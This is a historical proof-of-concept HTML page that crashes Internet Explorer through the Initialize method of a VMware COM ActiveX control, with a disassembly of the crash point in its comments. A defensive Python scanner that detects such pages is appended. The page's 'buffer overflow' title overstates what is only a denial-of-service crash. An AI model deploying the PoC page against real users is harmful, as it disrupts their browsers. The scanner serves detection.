<html>
<!--
<< Bug discovered by cN4phux >> a small GHH from DZ.

# VMware COM DB ActiveX Remote Buffer Overflow Exploit
#
# This was written for educational purposes. Use it at your own risk.
# The author will not be responsible for any damage.
# Tested on Windows XP Professional SP2 with Internet Explorer 6.x.x

CLSID       = '8F5DEA70-D1E7-4237-BCDB-D3D56ED3E6FA'
progID      = "VMDBCOMLib.VMList"
member_name = "Initialize"
Target_File = "C:\Program Files\VMware\VMware Server\vmdbCOM.dll"

# Function that is vulnerable to a DoS of IE: Initialize()
# Block Disassembly:

111AE667 RETN
111AE668 MOV EAX,[EBP+C]
111AE66B PUSH EBX
111AE66C PUSH EDI
111AE66D PUSH EAX
111AE66E MOV [ESI+4],EAX
111AE671 CALL [EAX]           <-- it will crash here
111AE673 MOV EBX,[EBP+8]
111AE676 PUSH 1133D9D0
111AE67B PUSH EBX
111AE67C CALL 111AF800
111AE681 MOV EDI,EAX
111AE683 ADD ESP,C
111AE686 TEST EDI,EDI
111AE688 JL 111AE731

Exception Code: ACCESS_VIOLATION
Disasm: 111AE671 CALL [EAX] (vmapplib.DLL)

# Greetz to friends: Blub, Zigma, Heurs, djug & etc . . .
-->
<object classid='clsid:8F5DEA70-D1E7-4237-BCDB-D3D56ED3E6FA' id='VMware_function'></object>
<input language=VBScript onclick=Buffer_Act() type=button value='Click here to start the crash DOS'>
<script language='vbscript'>
Sub Buffer_Act
    buff_1 = -2147483647
    buff_2 = 1
    buff_3 = unescape("%90")   ' not used in the call below
    ' Initialize with these arguments hits the access violation at 111AE671 (CALL [EAX])
    VMware_function.Initialize buff_1, buff_2
End Sub
</script>
</html>
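As an added defensive example (not part of the original exploit page), the following Python scanner flags HTML that embeds the vulnerable control by the CLSID or ProgID from the header above and that calls its Initialize method; the sample inputs are constructed and nothing in the scanned page is executed.

```python
import re

# Identifiers taken from the PoC header above.
VULN_CLSID = "8F5DEA70-D1E7-4237-BCDB-D3D56ED3E6FA"
VULN_PROGID = "VMDBCOMLib.VMList"
VULN_METHOD = "Initialize"

_OBJECT_TAG = re.compile(r"<object\b([^>]*)>", re.I | re.S)
_ATTR = re.compile(r'''(\w+)\s*=\s*(?:'([^']*)'|"([^"]*)"|([^\s'">]+))''', re.S)
# CreateObject("...") in VBScript or new ActiveXObject("...") in JScript.
_PROGID_USE = re.compile(r'''(?:CreateObject|ActiveXObject)\s*\(\s*['"]([^'"]+)['"]\s*\)''', re.I)


def _parse_attrs(attr_text):
    """Lowercase-keyed dict of the attributes inside one tag."""
    attrs = {}
    for m in _ATTR.finditer(attr_text):
        attrs[m.group(1).lower()] = next(v for v in m.groups()[1:] if v is not None)
    return attrs


def scan_html(html):
    """Return (kind, detail) findings: 'object' for an <object> tag with the vulnerable
    CLSID, 'progid' for instantiation by ProgID, 'call' for Initialize on a flagged element."""
    findings, element_ids = [], []
    for tag in _OBJECT_TAG.finditer(html):
        attrs = _parse_attrs(tag.group(1))
        classid = attrs.get("classid", "").strip().lower().replace("{", "").replace("}", "")
        if classid == "clsid:" + VULN_CLSID.lower():
            element_id = attrs.get("id")
            findings.append(("object", element_id or "<no id>"))
            if element_id:
                element_ids.append(element_id)
    for m in _PROGID_USE.finditer(html):
        if m.group(1).lower() == VULN_PROGID.lower():
            findings.append(("progid", m.group(0)))
    for element_id in element_ids:
        call = re.compile(r"\b%s\s*\.\s*%s\b" % (re.escape(element_id), VULN_METHOD), re.I)
        findings.extend(("call", m.group(0)) for m in call.finditer(html))
    return findings


# Constructed sample: the object tag and VBScript call shape used by the PoC.
SAMPLE_POC = """<object classid='clsid:8F5DEA70-D1E7-4237-BCDB-D3D56ED3E6FA' id='VMware_function'></object>
<script language='vbscript'>
Sub Buffer_Act
    VMware_function.Initialize buff_1, buff_2
End Sub
</script>"""
# Constructed benign page with a placeholder CLSID.
SAMPLE_BENIGN = "<object classid='clsid:00000000-0000-0000-0000-000000000000' id='other'></object>"
```

Run `scan_html()` over captured HTML from a proxy or mail gateway; any 'object' or 'progid' finding already warrants a look, and a 'call' finding matches the PoC's behaviour exactly.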